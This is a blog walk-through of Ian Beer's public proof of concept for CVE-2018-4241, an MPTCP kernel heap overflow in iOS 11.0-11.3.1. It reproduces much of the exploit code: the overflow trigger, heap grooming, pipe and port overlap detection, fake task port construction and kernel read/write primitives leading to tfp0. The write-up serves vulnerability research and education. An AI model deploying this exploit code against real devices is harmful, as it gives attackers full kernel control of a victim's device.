2018-07-19

Exploiting iOS 11.0-11.3.1 Multi-path-TCP:A walk through

by Ian Fang @fongtinyik, Qoobee @Qooobeee

Introduction

The iOS 11 mptcp bug (CVE-2018-4241) discovered by Ian Beer is a serious kernel vulnerability which involves a buffer overflow in mptcp_usr_connectx that allows attackers to execute arbitrary code in a privileged context.

Ian Beer attached an interesting piece of PoC code which demonstrated a rather elegant technique to obtain the kernel task port with this vulnerability. Extending on his brief writeup that comes with the PoC, this blog post will mainly aim at walking through the PoC in great details as well as covering its background. If you are an iOS security researcher who hasn’t looked into the PoC source code yet, hopefully you will find the materials handy when you decide to do so.

Please have a copy of mptcp PoC code before we dive in! You can download it from here: Download

Note: All credits for exploitation techniques, vulnerability PoC code and original writeup belong to Ian Beer at Google Project Zero.

The Vulnerability

Let’s first take a quick look at the offending code in mptcp_usr_connect(), which is the handler for the connectx syscall for the AP_MULTIPATH socket family:

if (src) {
    // verify sa_len for AF_INET
		if (src->sa_family == AF_INET &&
		    src->sa_len != sizeof(mpte->__mpte_src_v4)) {
			mptcplog((LOG_ERR, "%s IPv4 src len %u\n", __func__,
				  src->sa_len),
				 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
			error = EINVAL;
			goto out;
		}

    // verify sa_len for AF_INET6
		if (src->sa_family == AF_INET6 &&
		    src->sa_len != sizeof(mpte->__mpte_src_v6)) {
			mptcplog((LOG_ERR, "%s IPv6 src len %u\n", __func__,
				  src->sa_len),
				 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
			error = EINVAL;
			goto out;
		}

    // code doesn't bail if sa_family is neither AF_INET nor AF_INET6
		if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
			memcpy(&mpte->mpte_src, src, src->sa_len);
		}
	}

The code does not validate the sa_len field if src→sa_family is neither AF_INET nor AF_INET6 so the function directly falls through to memcpy with a user specified sa_len value up to 255 bytes.

Background

Kernel zone heap allocator

To oversimplify a bit, kernel heap memory is divided into zones, and within one zone allocations are of the same size. For each zone, kernel keeps four doubly-linked lists to categorize a page’s memory availability, namely:

struct {
  queue_head_t any_free_foreign;  
  queue_head_t all_free;
  queue_head_t intermediate;
  queue_head_t all_used;
} pages;

When a memory allocation is requested, intermediate page list is traversed before all_free list, and a free memory block will be returned from the first available page.

Preallocated ipc_kmsg buffer

ipc_port has a struct ipc_kmsg *premsg member that points to an optional preallocated ipc_kmsg buffer. The intended use case is to allow user space to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers. In addition, this kernel heap buffer will not be freed after the message gets delivered to user space. Ian Beer uses this fact to increase the stability of the exploit.

Mach exception port

Mach provides an IPC-based exception-handling facility wherein exceptions are converted to messages. A thread or task can register one or multiple mach ports as so-called “exception port” to receive information about an exception. When an exception occurs, a message containing information about the exception is sent to the exception port. In this way, together with a mach port with preallocated ipc_kmsg buffer, we can force the kernel to send data to a deterministic location in the heap. Furthermore, we can also partially control the content of the message by manipulating the register state at the time of the exception, which will be dutifully carried over in the message by the kernel.

For more information about preallocated message and exception handling mechanism, readers are adviced to check out Ian Beer’s excellent writeup on the iOS 10 extra-recipe bug here, as well as Chapter 9.7 in Amit Singh’s seminal Mac OS X Internals.

Ok, let’s now dig in!

Finding the target

By passing in a src with an unexpected sa_family, we are now able to overflow inside mpte, a mptses structure, with sa_len bytes of attacker-controlled data. Here is the struct declaration in /bsd/netinet/mptcp_var.h:

struct mptses {
	...

	union {
	
		struct sockaddr	mpte_src;  // The field we are overflowing out of
		struct sockaddr_in __mpte_src_v4;
		struct sockaddr_in6 __mpte_src_v6;
	};

	union {
		
		struct sockaddr	mpte_dst;
		struct sockaddr_in __mpte_dst_v4;
		struct sockaddr_in6 __mpte_dst_v6;
	};
  ...

#define	MPTE_ITFINFO_SIZE	4
	uint32_t	mpte_itfinfo_size;
	struct mpt_itf_info	_mpte_itfinfo[MPTE_ITFINFO_SIZE];
	struct mpt_itf_info	*mpte_itfinfo;
  ...
};

Here, the mpte_itfinfo is particularly interesting because it’s a pointer… keep digging in references to mpte_itfinfo… oh snap!

1 2	if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE) _FREE(mpte->mpte_itfinfo, M_TEMP);

In mptcp_session_destroy, the address pointed to by mpte_itfinfo is freed, and mpte_itfinfo_size is under our complete control too! Moreover, we don’t need to know a priori the size of the object we would like to _FREE, because kfree_addr() will look up the size from the memory zone struct in which the object resides. (_FREE is just a macro around kfree_addr().)

This is just too good to be true.

Set up the heap

To turn this overflow into something actually useful, it’s time for some heap Feng Shui. The end goal here is to have an ipc_kmsg and a pipe buffer overlapping with each other so that we can write to and read from it. In the PoC, Ian Beer chooses to overwrite the lower 3 bytes of mpte_itfinfo with 0x000000, after which it will point to a 16MB aligned page boundary.

In order to have an ipc_kmsg sitting right at that 16MB boundary, the code alternatingly allocates 16MB of ipc_kmsg and a bunch of mptcp sockets in the kernel heap. The former is done by allocating fake mach ports and sending mach messages of calculated size to the port, during which mach_msg(...MACH_SEND_MSG...) will allocate kernel heap buffer for us and copyin the message from user space. This technique allows us to effectively do the same thing as kalloc but from outside the kernel. We are also able to control the memory zone for the ipc_kmsg, since all it takes is just to work backward, calculate the msgh_size based on the kalloc size we would like to achieve. In the PoC, Ian Beer chose to place ipc_kmsgs in kalloc.2048 zone.

// a few times do:
  // alloc 16MB of messages
  // alloc a hundred sockets
  printf("trying to force a 16MB aligned 0x800 kalloc on to freelist\n");
  for (int i = 0; i < 7; i++) {
    printf("%d/6...\n", i);
    for (int j = 0; j < 0x2000; j++) {
      mach_port_t p = fake_kalloc(0x800); // kalloc.2048 zone block size
    }
    for (int j = 0; j < 100; j++) {
      int sock = alloc_mptcp_socket();
      
      // we'll keep two of them:
      if (i == 6 && (j==94 || j==95)) {
        target_socks[next_sock] = sock;
        next_sock++;
        next_sock %= (sizeof(target_socks)/sizeof(target_socks[0]));
      } else {
        sockets[next_all_sock++] = sock;
      }
    }
  }

Trigger the bug

The code in do_partial_kfree_with_socket triggers the bug, overwriting the lower 3 bytes of *mpte_itfinfo with NULL bytes and let’s hope now it somewhat looks like the diagram shown below. Fingers crossed! 🤞

void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes) {
  struct sockaddr* sockaddr_src = malloc(256);
  memset(sockaddr_src, 'D', 256);
  *(uint64_t*) (((uint8_t*)sockaddr_src)+koffset(KFREE_ADDR_OFFSET)) = kaddr;
  sockaddr_src->sa_len = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  sockaddr_src->sa_family = 'B'; // An abnormal sa_family 
  
  struct sockaddr* sockaddr_dst = malloc(256);
  memset(sockaddr_dst, 'C', 256);
  sockaddr_dst->sa_len = sizeof(struct sockaddr_in6);
  sockaddr_dst->sa_family = AF_INET6;
  
  sa_endpoints_t eps = {0};
  eps.sae_srcif = 0;
  eps.sae_srcaddr = sockaddr_src;
  eps.sae_srcaddrlen = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  eps.sae_dstaddr = sockaddr_dst;
  eps.sae_dstaddrlen = sizeof(struct sockaddr_in6);
  
  printf("doing partial overwrite with target value: %016llx, length %d\n", kaddr, n_bytes);
  
  int err = connectx(
                     fd,
                     &eps,
                     SAE_ASSOCID_ANY,
                     0,
                     NULL,
                     0,
                     NULL,
                     NULL);

  
  printf("err: %d\n", err);
  
  close(fd); // Trigger the _FREE, but need to wait for mptcp_gc
  
  
  return;
}

After we point mpte_itfinfo to the 16MB boundary, we can trigger the _FREE by just close the socket.

One caveat is that we need to wait for mptcp_gc because mpte_itfinfo is not instantaneously _FREE‘ed after socket is closed, as evident by the comments of this function in /xnu-4570.41.2/bsd/netinet/mptcp_subr.c:

/*
 * MPTCP garbage collector.
 *
 * This routine is called by the MP domain on-demand, periodic callout,
 * which is triggered when a MPTCP socket is closed.  The callout will
 * repeat as long as this routine returns a non-zero value.
 */
static uint32_t
mptcp_gc(struct mppcbinfo *mppi)
{
...
    mptcp_session_destroy(mpte); // mpte_itfinfo is _FREE'ed here
...
    return (active)
}

printf("waiting for second mptcp gc...\n");
  // wait for the mptcp gc...
  for (int i = 0; i < 400; i++) {
    usleep(10000);
}

After _FREE, hopefully now one of the ipc_kmsg is freed and the page put on the Intermidiate list.

Allocate pipes

Next, we allocate a bunch of pipes and write to its write end 2047 bytes of data. The backing buffers for these pipes will come from kalloc.2048, hopefully including our 16MB-aligned address:

Trigger the bug again

Trigger the bug a second time, _FREE the underlying pipe buffer and put the page on Intermediate page list again.

After overflow:

After _FREE:

Allocate more mach ports!

Next, we allocate a bunch of mach ports with preallocated ipc_kmsg buffers from kalloc.2048 zone using mach_port_allocate_full() and pass in the size as a member of the mach_port_qos_t parameter. The desired size for the preallocated buffer is 2048 bytes in order to place it in kalloc.2048 zone, hopefully one of them picks up the space we just _FREE ‘ed.

We then insert a SEND RIGHT to every mach port we allocated in this step, as each one will be registered as another thread’s exception port later.

Catching the pipe

As shown on the diagram above, ideally now we have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) overlapping each other.

We now need to find out which one of the hundreds of pipes we allocated a while ago is on that spot.

int find_replacer_pipe(void** contents) {
  uint64_t* read_back = malloc(PIPE_SIZE);
  for (int i = 0; i < next_read_fd; i++) {
    int fd = read_fds[i];
    ssize_t amount = read(fd, read_back, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    } else {
      printf("full read\n");
    }
    
    int pipe_is_replacer = 0;
    for (int j = 0; j < PIPE_SIZE/8; j++) {
      if (read_back[j] != 0x4242424242424242) { // Is the content still "BBBBBBBB"?
        pipe_is_replacer = 1;
        printf("found an unexpected value: %016llx\n", read_back[j]);
      }
    }
    
    if (pipe_is_replacer) {
      *contents = read_back;
      return fd;
    }
  }
  return -1;
}

The technique Ian Beer used here is just to read from each pipe, and compare the content read with the original data we piped into the buffer, BBBBBBBBB (0x4242424242 in hex). If different, that means the underlying buffer has been overwritten by a newly allocated ipc_kmsg.

If we can’t find a pipe satisfying this condition it simply means there is no overlapping, and we just have to restart and wish ourselves better luck next time.

Catching the port

Now, we need to figure out which port owns the preallocated ipc_kmsg buffer. To do that, we need to somehow persuade the kernel into overwriting prealloced kmsg with something different so that we can compare the content again and spot the difference.

Ian Beer’s technique in the PoC is to register each port as an exception port for a thread and intentionally raise an exception on the thread, causing the kernel to send a kmsg to the buffer, then immediately compares the content by reading from the pipe. This is ingenious.

for (int i = 0; i < 100; i++) {
    send_prealloc_msg(exception_ports[i]);
    // read from the pipe and see if the contents changed:

Let’s walk through send_prealloc_msg() step by step.

1. Start a thread

pthread_create(&t, NULL, do_thread, (void*)port);

2. Register exception port

void* do_thread(void* arg) {
  mach_port_t exception_port = (mach_port_t)arg;
  
  kern_return_t err;
  err = thread_set_exception_ports(
                                   mach_thread_self(),
                                   EXC_MASK_ALL,
                                   exception_port,
                                   EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
                                   ARM_THREAD_STATE64);

3. Substitute thread port with a host port

1 2	// make the thread port which gets sent in the message actually be the host port err = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_host_self());

4. Crash the thread

// cause an exception message to be sent by the kernel
  volatile char* bAAAAd_ptr = (volatile char*)0x41414141;
  *bAAAAd_ptr = 'A';
// Now the thread is crashed

After the thread crashes, a message containing the exception information is sent to our ipc_kmsg buffer, waiting to be received and processed by the port. We can now read from the pipe and compare the content.

ssize_t amount = read(replacer_pipe, new_contents, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    }
    if (memcmp(original_contents, new_contents, PIPE_SIZE) == 0) {
      // they are still the same, this isn't the correct port:
      ...
    } else {
      // different! we found the right exception port which has its prealloced port overlapping
      replacer_port = exception_ports[i];

      break;
    }
  }

At this point, we have fully discovered the overlapping pipe, port pair.

We also need to save the kernel address for the host port and our task port for later:

// We will get kernel ipc_space address from this later
uint64_t host_port_kaddr = *((uint64_t*)(new_contents + 0x66c));

// Need this for cleaning up mach port table
uint64_t task_port_kaddr = *((uint64_t*)(new_contents + 0x67c));

Build fake task port

Before we receive the exception message into user space, we want to build a fake task port to allow early kernel arbitray read.

build_fake_task_port(original_contents+fake_port_offset, fake_port_kaddr, early_read_pipe_buffer_kaddr, 0, 0);

We can do this by mimicking the structure of a proper task port:

#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_NONE 0

void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver) {
  // clear the region we'll use:
  memset(fake_port, 0, 0x500);
  
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK;
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = 0x123456789abcdef;
  
  
  uint64_t fake_task_kaddr = fake_port_kaddr + 0x100;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr;
  
  ...
}

and shoving it into our ipc_kmsg buffer with our replacer_pipe.

// the thread port is at +66ch
  // we could parse the kmsg properly, but this'll do...
  // replace the thread port pointer with one to our fake port:
  *((uint64_t*)(original_contents+0x66c)) = fake_port_kaddr;
  
  // replace the ipc_kmsg:
  write(pipe_write_end, original_contents, PIPE_SIZE);

We can read off the kernel address of our buffer from the next field, which points back to the buffer itself given it is the only ipc_kmsg in the queue.

1	uint64_t pipe_buf = ((uint64_t)(new_contents + 0x8));

Let’s zoom into our ipc_kmsg buffer to observe the change.

Now, the thread_port points to our fake task port! Mission accomplished!

Note: Here, in this particular PoC, *thread_port actually points to a host port because in Step 3 of the previous section, we substitute the thread port with host port. By doing this, we have a leaked host port kernel address, which can be used to obtain kernel’s ipc_space later. We will cover this shortly.

Receive the exception message

User space programs can receive the exception message by a callout to system exception server, exc_server, after which various port rights in the ipc_kmsg will be inserted into calling task’s ipc_space, including our fake task port’s send right (which is really supposed to be a thread port).

We can now simply extract the port name to the fake port from the exception handler callback, from the thread argument:

kern_return_t catch_exception_raise_state_identity
(
 mach_port_t exception_port,
 mach_port_t thread,
 mach_port_t task,
 exception_type_t exception,
 exception_data_t code,
 mach_msg_type_number_t codeCnt,
 int *flavor,
 thread_state_t old_state,
 mach_msg_type_number_t old_stateCnt,
 thread_state_t new_state,
 mach_msg_type_number_t *new_stateCnt
 )
{
  printf("catch_exception_raise_state_identity\n");
  
    
    
  // the thread port isn't actually the thread port
  // we rewrote it via the pipe to be the fake kernel r/w port
  printf("thread: %x\n", thread);
  extracted_thread_port = thread;
  
  mach_port_deallocate(mach_task_self(), task);
  
  // make the thread exit cleanly when it resumes:
  memcpy(new_state, old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
  _STRUCT_ARM_THREAD_STATE64* new = (_STRUCT_ARM_THREAD_STATE64*)(new_state);
  
  *new_stateCnt = old_stateCnt;
  
  new->__pc = (uint64_t)pthread_exit;
  new->__x[0] = 0;
  
  // let the thread resume and exit
  return KERN_SUCCESS;
}

At this point, we have successfully inserted a fake task port into our task’s ipc_space. Isn’t this ingenious?

Build early kernel read primitive

With the fake task port we can build an early kernel read primitive by using pid_for_task().

Given a valid task port, pid_for_task() simply get a task pointer from port’s ip_kobject, deference and retrieve the proc pointer from task’s bsd_info , dereference again the proc struct and get the pid from it. Since all it does is just some pointer arithmetic and dereferencing, we can just create a fake task struct inside the ipc_kmsg we control, work backward and place the kernel address we would like to read at the correct offset.

uint8_t* fake_task = fake_port + 0x100;

// set the bsd_info pointer to be 0x10 bytes before the desired initial read:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10;

With every call to early_rk32, we just need to rebuild the task port, fixing the bsd_info pointer address accordingly:

Here, unsurprisingly, 0x10 is just the offset of the p_pid field inside struct proc, as evident in proc_internal.h:

struct	proc {
	LIST_ENTRY(proc) p_list;	// Just two pointers, so size 0x10

	pid_t		p_pid;			// Offset 0x10
	void * 		task;	
...
}

The drawback of this technique is that the read is limited to 32 bits, which is the size of a pid_t.

Build full kernel read/write primitive

Notice that the struct ipc_space *receiver field in our fake port and an address space description, vm_map_t map, in our fake task is still missing. We can achieve full kernel read/write by filling in the address for ipc_space_kernel and kernel task’s vm_map.

We can get the kernel ipc_space from the host port we obtained a while ago, with a known offset:

1 2	// receiver field uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));

However, kernel’s vm_map is a bit trickier to get.

Ian Beer’s approach takes the following steps:

Find the kernel task port on the heap
Get kernel’s task from task port
Get the vm_map form kernel task

To find the kernel task port on the heap, we search in the vicinity of the host port for anything that looks like a task port and get the kernel task vm_map from it:

// now look through up to 0x4000 of ports and find one which looks like a task port:
  for (int i = 0; i < (0x4000/0xa8); i++) {
    uint64_t early_port_kaddr = first_port + (i*0xa8);
    uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
    
    if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
      continue;
    }
    
    // get that port's kobject:
    uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    if (task_t == 0) {
      printf("weird heap object with NULL kobject\n");
      continue;
    }
    
    // check the pid via the bsd_info:
    uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
    if (bsd_info == 0) {
      printf("task doesn't have a bsd info\n");
      continue;
    }
    uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
    if (pid != 0) {
      printf("task isn't the kernel task\n");
    }
    
    // found the right task, get the vm_map
    kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
    break;
  }
  
  if (kernel_vm_map == 0) {
    printf("unable to find the kernel task map\n");
    return;
  }

printf("kernel map:%016llx\n", kernel_vm_map);

After insert what we just found into our fake port and fake task, we now finally get a fully functional, but “fake”, tfp0. Hooray!

Have fun now with your freshly baked tfp0!

Reference

XNU kernel heap overflow due to bad bounds checking in MPTCP, Ian Beer
Exception-based exploitation on iOS, Ian Beer
CVE-2018-4241, Common Vulnerabilities and Exposures
Mac OS X Internals - A System Approach, Amit Singh
*OS Internals: Volume III security & Insecurity, Jonathan Levin